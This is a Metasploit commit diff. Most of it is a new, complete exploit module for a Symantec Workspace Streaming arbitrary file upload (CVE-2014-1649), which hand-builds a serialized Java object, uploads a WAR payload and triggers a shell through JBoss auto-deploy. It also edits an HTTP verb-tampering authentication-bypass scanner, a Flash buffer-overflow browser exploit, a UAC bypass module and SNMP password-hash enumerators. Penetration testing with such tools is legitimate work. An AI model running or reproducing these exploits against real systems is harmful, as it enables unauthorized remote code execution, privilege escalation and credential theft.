         # Attempt verb tampering bypass
119 114
         bypass_auth(url)
120
-      when res.code == 404
115
+      when 404
121 116
         # Do not return by default, only display in verbose mode
122
-        vprint_status("#{rhost}:#{rport} #{url.strip} - not found (404)")
123
-      when res.code == 500
124
-        print_good("#{rhost}:#{rport} #{url} - produced a server error (500)")
125
-      when res.code == 301, res.code == 302
126
-        print_good("#{rhost}:#{rport} #{url} - redirected (#{res.code}) to #{res.headers['Location']} (not following)")
117
+        vprint_status("#{full_url} - not found (#{res.code})")
118
+      when 400, 500
119
+        print_status("#{full_url} - produced a server error (#{res.code})")
120
+      when 301, 302
121
+        print_good("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)")
122
+        @valid_urls << full_url << "\n"
123
+      when 307
124
+        print_status("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)")
127 125
       else
128
-        vprint_status("#{rhost}:#{rport} - unhandle response code #{res.code}")
126
+        print_error("#{full_url} - unhandled response code #{res.code}")
127
+        @valid_urls << full_url << "\n"
129 128
       end
130 129
 
131 130
     else
132
-      print_status("#{rhost}:#{rport} #{url} - not found (No Repsonse code Received)")
131
+      vprint_status("#{full_url} - not found (No Repsonse code Received)")
133 132
     end
134 133
   end
135 134
 
135
+  def write_url(path)
136
+    if datastore['SSL']
137
+      protocol = 'https://'
138
+    else
139
+      protocol = 'http://'
140
+    end
141
+
142
+    "#{protocol}#{rhost}:#{rport}#{path}"
143
+  end
144
+
136 145
   def bypass_auth(url)
137
-    print_status("#{rhost}:#{rport} Check for verb tampering (#{datastore['VERB']})")
146
+    full_url = write_url(url)
147
+    vprint_status("#{full_url} Check for verb tampering (#{datastore['VERB']})")
138 148
 
139 149
     res = send_request_raw({
140
-      'uri'       => url,
150
+      'uri'       => normalize_uri(url),
141 151
       'method'    => datastore['VERB'],
142 152
       'version'   => '1.0' # 1.1 makes the head request wait on timeout for some reason
143
-    }, 20)
153
+    })
144 154
 
145
-    if (res and res.code == 200)
146
-      print_good("#{rhost}:#{rport} Got authentication bypass via HTTP verb tampering")
155
+    if (res && res.code == 200)
156
+      print_good("#{full_url} Got authentication bypass via HTTP verb tampering")
147 157
     else
148
-      print_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering")
158
+      vprint_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering")
149 159
     end
150 160
   end
161
+
162
+  # "/urlprefix outputs the list of URL prefixes that are handled in the ABAP part of the SAP Web AS.
163
+  # This is how the message server finds out which URLs must be forwarded where.
164
+  #  (SAP help) -> this disclose custom URLs that are also checked for authentication
165
+  def check_urlprefixes
166
+    urls = []
167
+    res = send_request_cgi({
168
+      'uri'       => "/sap/public/icf_info/urlprefix",
169
+      'method'    => 'GET',
170
+    })
171
+
172
+    if (res && res.code == 200)
173
+      res.body.each_line do |line|
174
+        if line =~ /PREFIX=/
175
+          url_enc = line.sub(/^PREFIX=/, '')
176
+          # Remove CASE and VHOST
177
+          url_enc = url_enc.sub(/&CASE=.*/, '')
178
+          url_dec = URI.unescape(url_enc).sub(/;/, '')
179
+          urls << url_dec.strip
180
+        end
181
+      end
182
+    else
183
+      print_error("#{rhost}:#{rport} Could not retrieve urlprefixes")
184
+    end
185
+
186
+    urls
187
+  end
151 188
 end

+ 2
- 2
modules/auxiliary/scanner/snmp/brocade_enumhash.rb View File

@@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
44 44
           row.each { |val| @hashes << val.value.to_s }
45 45
         end
46 46
 
47
-        print_good("#{ip} Found Users & Password Hashes:")
47
+        print_good("#{ip} - Found user and password hashes:")
48 48
         end
49 49
 
50 50
         credinfo = ""
@@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
67 67
      rescue ::Interrupt
68 68
        raise $!
69 69
      rescue ::Exception => e
70
-       print_error("#{ip} error: #{e.class} #{e}")
70
+       print_error("#{ip} - Error: #{e.class} #{e}")
71 71
      disconnect_snmp
72 72
      end
73 73
   end

+ 1
- 1
modules/auxiliary/scanner/snmp/netopia_enum.rb View File

@@ -95,7 +95,7 @@ class Metasploit3 < Msf::Auxiliary
95 95
      rescue ::Interrupt
96 96
        raise $!
97 97
      rescue ::Exception => e
98
-       print_error("#{ip} error: #{e.class} #{e}")
98
+       print_error("#{ip} - Error: #{e.class} #{e}")
99 99
      disconnect_snmp
100 100
      end
101 101
   end

+ 1
- 1
modules/auxiliary/scanner/snmp/ubee_ddw3611.rb View File

@@ -152,7 +152,7 @@ class Metasploit3 < Msf::Auxiliary
152 152
      rescue ::Interrupt
153 153
        raise $!
154 154
      rescue ::Exception => e
155
-       print_error("#{ip} error: #{e.class} #{e}")
155
+       print_error("#{ip} - Error: #{e.class} #{e}")
156 156
      disconnect_snmp
157 157
      end
158 158
   end

+ 356
- 0
modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb View File

@@ -0,0 +1,356 @@
1
+##
2
+# This module requires Metasploit: http//metasploit.com/download
3
+# Current source: https://github.com/rapid7/metasploit-framework
4
+##
5
+
6
+require 'msf/core'
7
+require 'rexml/document'
8
+
9
+class Metasploit3 < Msf::Exploit::Remote
10
+  Rank = ExcellentRanking
11
+
12
+  include Msf::Exploit::Remote::HttpClient
13
+  include Msf::Exploit::FileDropper
14
+  include REXML
15
+
16
+  def initialize(info = {})
17
+    super(update_info(info,
18
+      'Name'        => 'Symantec Workspace Streaming Arbitrary File Upload',
19
+      'Description' => %q{
20
+        This module exploits a code execution flaw in Symantec Workspace Streaming. The
21
+        vulnerability exists in the ManagementAgentServer.putFile XMLRPC call exposed by the
22
+        as_agent.exe service, which allows for uploading arbitrary files under the server root.
23
+        This module abuses the auto deploy feature in the JBoss as_ste.exe instance in order
24
+        to achieve remote code execution. This module has been tested successfully on Symantec
25
+        Workspace Streaming 6.1 SP8 and Windows 2003 SP2. Abused services listen on a single
26
+        machine deployment, and also in the backend role in a multiple machine deployment.
27
+      },
28
+      'Author'       =>
29
+        [
30
+          'rgod <rgod[at]autistici.org>', # Vulnerability discovery
31
+          'juan vazquez' # Metasploit module
32
+        ],
33
+      'License'     => MSF_LICENSE,
34
+      'References'  =>
35
+        [
36
+          ['CVE', '2014-1649'],
37
+          ['BID', '67189'],
38
+          ['ZDI', '14-127'],
39
+          ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140512_00']
40
+        ],
41
+      'Privileged'  => true,
42
+      'Platform'    => 'java',
43
+      'Arch' => ARCH_JAVA,
44
+      'Targets'     =>
45
+        [
46
+          [ 'Symantec Workspace Streaming 6.1 SP8 / Java Universal', {} ]
47
+        ],
48
+      'DefaultTarget'  => 0,
49
+      'DisclosureDate' => 'May 12 2014'))
50
+
51
+    register_options(
52
+      [
53
+        Opt::RPORT(9855), # as_agent.exe (afuse XMLRPC to upload arbitrary file)
54
+        OptPort.new('STE_PORT', [true, "The remote as_ste.exe AS server port", 9832]), # as_ste.exe (abuse jboss auto deploy)
55
+      ], self.class)
56
+  end
57
+
58
+  def send_xml_rpc_request(xml)
59
+    res = send_request_cgi(
60
+      {
61
+        'uri'     => normalize_uri("/", "xmlrpc"),
62
+        'method'  => 'POST',
63
+        'ctype'   => 'text/xml; charset=UTF-8',
64
+        'data'    => xml
65
+      })
66
+
67
+    res
68
+  end
69
+
70
+  def build_soap_get_file(file_path)
71
+    xml = Document.new
72
+    xml.add_element(
73
+        "methodCall",
74
+        {
75
+            'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions"
76
+        })
77
+    method_name = xml.root.add_element("methodName")
78
+    method_name.text = "ManagementAgentServer.getFile"
79
+
80
+    params = xml.root.add_element("params")
81
+
82
+    param_server_root = params.add_element("param")
83
+    value_server_root = param_server_root.add_element("value")
84
+    value_server_root.text = "*AWESE"
85
+
86
+    param_file_type = params.add_element("param")
87
+    value_file_type = param_file_type.add_element("value")
88
+    type_file_type = value_file_type.add_element("i4")
89
+    type_file_type.text = "0" # build path from the server root directory
90
+
91
+    param_file_name = params.add_element("param")
92
+    value_file_name = param_file_name.add_element("value")
93
+    value_file_name.text = file_path
94
+
95
+    param_file_binary = params.add_element("param")
96
+    value_file_binary = param_file_binary.add_element("value")
97
+    type_file_binary = value_file_binary.add_element("boolean")
98
+    type_file_binary.text = "0"
99
+
100
+    xml << XMLDecl.new("1.0", "UTF-8")
101
+
102
+    xml.to_s
103
+  end
104
+
105
+  def build_soap_put_file(file)
106
+    xml = Document.new
107
+    xml.add_element(
108
+        "methodCall",
109
+        {
110
+            'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions"
111
+        })
112
+    method_name = xml.root.add_element("methodName")
113
+    method_name.text = "ManagementAgentServer.putFile"
114
+
115
+    params = xml.root.add_element("params")
116
+
117
+    param_server_root = params.add_element("param")
118
+    value_server_root = param_server_root.add_element("value")
119
+    value_server_root.text = "*AWESE"
120
+
121
+    param_file_type = params.add_element("param")
122
+    value_file_type = param_file_type.add_element("value")
123
+    type_file_type = value_file_type.add_element("i4")
124
+    type_file_type.text = "0" # build path from the server root directory
125
+
126
+    param_file = params.add_element("param")
127
+    value_file = param_file.add_element("value")
128
+    type_value_file = value_file.add_element("ex:serializable")
129
+    type_value_file.text = file
130
+
131
+    xml << XMLDecl.new("1.0", "UTF-8")
132
+
133
+    xml.to_s
134
+  end
135
+
136
+  def build_soap_check_put
137
+    xml = Document.new
138
+    xml.add_element(
139
+        "methodCall",
140
+        {
141
+            'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions"
142
+        })
143
+    method_name = xml.root.add_element("methodName")
144
+    method_name.text = "ManagementAgentServer.putFile"
145
+    xml.root.add_element("params")
146
+    xml << XMLDecl.new("1.0", "UTF-8")
147
+    xml.to_s
148
+  end
149
+
150
+  def parse_method_response(xml)
151
+    doc = Document.new(xml)
152
+    file = XPath.first(doc, "methodResponse/params/param/value/ex:serializable")
153
+
154
+    unless file.nil?
155
+      file = Rex::Text.decode_base64(file.text)
156
+    end
157
+
158
+    file
159
+  end
160
+
161
+  def get_file(path)
162
+    xml_call = build_soap_get_file(path)
163
+    file = nil
164
+
165
+    res = send_xml_rpc_request(xml_call)
166
+
167
+    if res && res.code == 200 && res.body
168
+      file = parse_method_response(res.body.to_s)
169
+    end
170
+
171
+    file
172
+  end
173
+
174
+  def put_file(file)
175
+    result = nil
176
+    xml_call = build_soap_put_file(file)
177
+
178
+    res = send_xml_rpc_request(xml_call)
179
+
180
+    if res && res.code == 200 && res.body
181
+      result = parse_method_response(res.body.to_s)
182
+    end
183
+
184
+    result
185
+  end
186
+
187
+  def upload_war(war_name, war, dst)
188
+    result = false
189
+    java_file = build_java_file_info("#{dst}#{war_name}", war)
190
+    java_file = Rex::Text.encode_base64(java_file)
191
+
192
+    res = put_file(java_file)
193
+
194
+    if res && res =~ /ReturnObject.*StatusMessage.*Boolean/
195
+      result = true
196
+    end
197
+
198
+    result
199
+  end
200
+
201
+  def jboss_deploy_path
202
+    path = nil
203
+    leak = get_file("bin/CreateDatabaseSchema.cmd")
204
+
205
+    if leak && leak =~ /\[INSTALLDIR\](.*)ste\/ste.jar/
206
+      path = $1
207
+    end
208
+
209
+    path
210
+  end
211
+
212
+  def check
213
+    check_result = Exploit::CheckCode::Safe
214
+
215
+    if jboss_deploy_path.nil?
216
+      xml = build_soap_check_put
217
+      res = send_xml_rpc_request(xml)
218
+
219
+      if res && res.code == 200 && res.body && res.body.to_s =~ /No method matching arguments/
220
+        check_result =  Exploit::CheckCode::Detected
221
+      end
222
+    else
223
+      check_result =  Exploit::CheckCode::Appears
224
+    end
225
+
226
+    check_result
227
+  end
228
+
229
+  def exploit
230
+    print_status("#{peer} - Leaking the jboss deployment directory...")
231
+    jboss_path =jboss_deploy_path
232
+
233
+    if jboss_path.nil?
234
+      fail_with(Exploit::Unknown, "#{peer} - Failed to disclose the jboss deployment directory")
235
+    end
236
+
237
+    print_status("#{peer} - Building WAR payload...")
238
+
239
+    app_name = Rex::Text.rand_text_alpha(4 + rand(4))
240
+    war_name = "#{app_name}.war"
241
+    war = payload.encoded_war({ :app_name => app_name }).to_s
242
+    deploy_dir = "..#{jboss_path}"
243
+
244
+    print_status("#{peer} - Uploading WAR payload...")
245
+
246
+    res = upload_war(war_name, war, deploy_dir)
247
+
248
+    unless res
249
+      fail_with(Exploit::Unknown, "#{peer} - Failed to upload the war payload")
250
+    end
251
+
252
+    register_files_for_cleanup("../server/appstream/deploy/#{war_name}")
253
+
254
+    10.times do
255
+      select(nil, nil, nil, 2)
256
+
257
+      # Now make a request to trigger the newly deployed war
258
+      print_status("#{rhost}:#{ste_port} - Attempting to launch payload in deployed WAR...")
259
+      res = send_request_cgi(
260
+        {
261
+          'uri'    => normalize_uri("/", app_name, Rex::Text.rand_text_alpha(rand(8)+8)),
262
+          'method' => 'GET',
263
+          'rport'  => ste_port # Auto Deploy can be reached through the "as_ste.exe" service
264
+        })
265
+      # Failure. The request timed out or the server went away.
266
+      break if res.nil?
267
+      # Success! Triggered the payload, should have a shell incoming
268
+      break if res.code == 200
269
+    end
270
+
271
+  end
272
+
273
+  def ste_port
274
+    datastore['STE_PORT']
275
+  end
276
+
277
+  # com.appstream.cm.general.FileInfo serialized object
278
+  def build_java_file_info(file_name, contents)
279
+    stream =  "\xac\xed" # stream magic
280
+    stream << "\x00\x05" # stream version
281
+    stream << "\x73" # new Object
282
+
283
+    stream << "\x72" # TC_CLASSDESC
284
+    stream << ["com.appstream.cm.general.FileInfo".length].pack("n")
285
+    stream << "com.appstream.cm.general.FileInfo"
286
+    stream << "\xa3\x02\xb6\x1e\xa1\x6b\xf0\xa7" # class serial version identifier
287
+    stream << "\x02" # flags SC_SERIALIZABLE
288
+    stream << [6].pack("n") # number of fields in the class
289
+
290
+    stream << "Z" # boolean
291
+    stream << ["bLastPage".length].pack("n")
292
+    stream << "bLastPage"
293
+
294
+    stream << "J" # long
295
+    stream << ["lFileSize".length].pack("n")
296
+    stream << "lFileSize"
297
+
298
+    stream << "[" # array
299
+    stream << ["baContent".length].pack("n")
300
+    stream << "baContent"
301
+    stream << "\x74" # TC_STRING
302
+    stream << ["[B".length].pack("n")
303
+    stream << "[B" # field's type (byte array)
304
+
305
+    stream << "L" # Object
306
+    stream << ["dTimeStamp".length].pack("n")
307
+    stream << "dTimeStamp"
308
+    stream << "\x74" # TC_STRING
309
+    stream << ["Ljava/util/Date;".length].pack("n")
310
+    stream << "Ljava/util/Date;" #field's type (Date)
311
+
312
+    stream << "L" # Object
313
+    stream << ["sContent".length].pack("n")
314
+    stream << "sContent"
315
+    stream << "\x74" # TC_STRING
316
+    stream << ["Ljava/lang/String;".length].pack("n")
317
+    stream << "Ljava/lang/String;" #field's type (String)
318
+
319
+    stream << "L" # Object
320
+    stream << ["sFileName".length].pack("n")
321
+    stream << "sFileName"
322
+    stream << "\x71" # TC_REFERENCE
323
+    stream << [0x007e0003].pack("N") # handle
324
+
325
+    stream << "\x78" # TC_ENDBLOCKDATA
326
+    stream << "\x70" # TC_NULL
327
+
328
+    # Values
329
+    stream << [1].pack("c") # bLastPage
330
+
331
+    stream << [0xffffffff, 0xffffffff].pack("NN") # lFileSize
332
+
333
+    stream << "\x75" # TC_ARRAY
334
+    stream << "\x72" # TC_CLASSDESC
335
+    stream << ["[B".length].pack("n")
336
+    stream << "[B" # byte array)
337
+    stream << "\xac\xf3\x17\xf8\x06\x08\x54\xe0" # class serial version identifier
338
+    stream << "\x02" # flags SC_SERIALIZABLE
339
+    stream << [0].pack("n") # number of fields in the class
340
+    stream << "\x78" # TC_ENDBLOCKDATA
341
+    stream << "\x70" # TC_NULL
342
+    stream << [contents.length].pack("N")
343
+    stream << contents # baContent
344
+
345
+    stream << "\x70" # TC_NULL # dTimeStamp
346
+
347
+    stream << "\x70" # TC_NULL # sContent
348
+
349
+    stream << "\x74" # TC_STRING
350
+    stream << [file_name.length].pack("n")
351
+    stream << file_name # sFileName
352
+
353
+    stream
354
+  end
355
+
356
+end

+ 7
- 7
modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb View File

@@ -17,8 +17,8 @@ class Metasploit3 < Msf::Exploit::Remote
17 17
         This module exploits a buffer overflow vulnerability in Adobe Flash Player. The
18 18
         vulnerability occurs in the flash.Display.Shader class, when setting specially
19 19
         crafted data as its bytecode, as exploited in the wild in April 2014. This module
20
-        has been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over
21
-        Windows XP SP3, Windows 7 SP1 and Windows 8.
20
+        has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13
21
+        over Windows XP SP3, Windows 7 SP1 and Windows 8.
22 22
       },
23 23
       'License'        => MSF_LICENSE,
24 24
       'Author'         =>
@@ -42,7 +42,8 @@ class Metasploit3 < Msf::Exploit::Remote
42 42
         },
43 43
       'DefaultOptions'  =>
44 44
         {
45
-          'InitialAutoRunScript' => 'migrate -f',
45
+          # Disabled by default to allow sessions on Firefox, still useful when exploiting IE
46
+          #'InitialAutoRunScript' => 'migrate -f',
46 47
           'Retries'              => false,
47 48
           'EXITFUNC'             => "thread"
48 49
         },
@@ -50,10 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote
50 51
       'BrowserRequirements' =>
51 52
         {
52 53
           :source  => /script|headers/i,
53
-          :clsid   => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
54
-          :method  => "LoadMovie",
55 54
           :os_name => Msf::OperatingSystems::WINDOWS,
56
-          :ua_name => Msf::HttpClients::IE,
55
+          :ua_name => lambda { |ua| ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF},
57 56
           :flash   => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') }
58 57
         },
59 58
       'Targets'        =>
@@ -84,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
84 83
 
85 84
     if request.uri =~ /\.swf$/
86 85
       print_status("Sending SWF...")
87
-      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
86
+      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
88 87
       return
89 88
     end
90 89
 
@@ -111,6 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
111 110
     <param name="allowScriptAccess" value="always" />
112 111
     <param name="FlashVars" value="sh=<%=flash_payload%>" />
113 112
     <param name="Play" value="true" />
113
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=flash_payload%>" Play="true"/>
114 114
     </object>
115 115
     </body>
116 116
     </html>

+ 2
- 0
modules/exploits/windows/local/bypassuac_injection.rb View File

@@ -24,6 +24,8 @@ class Metasploit3 < Msf::Exploit::Local
24 24
         technique to drop only the DLL payload binary instead of three seperate
25 25
         binaries in the standard technique. However, it requires the correct
26 26
         architecture to be selected, (use x64 for SYSWOW64 systems also).
27
+        If specifying EXE::Custom your DLL should call ExitProcess() after starting
28
+        your payload in a seperate process.
27 29
       },
28 30
       'License'       => MSF_LICENSE,
29 31
       'Author'        => [

Loading…
Cancel
Save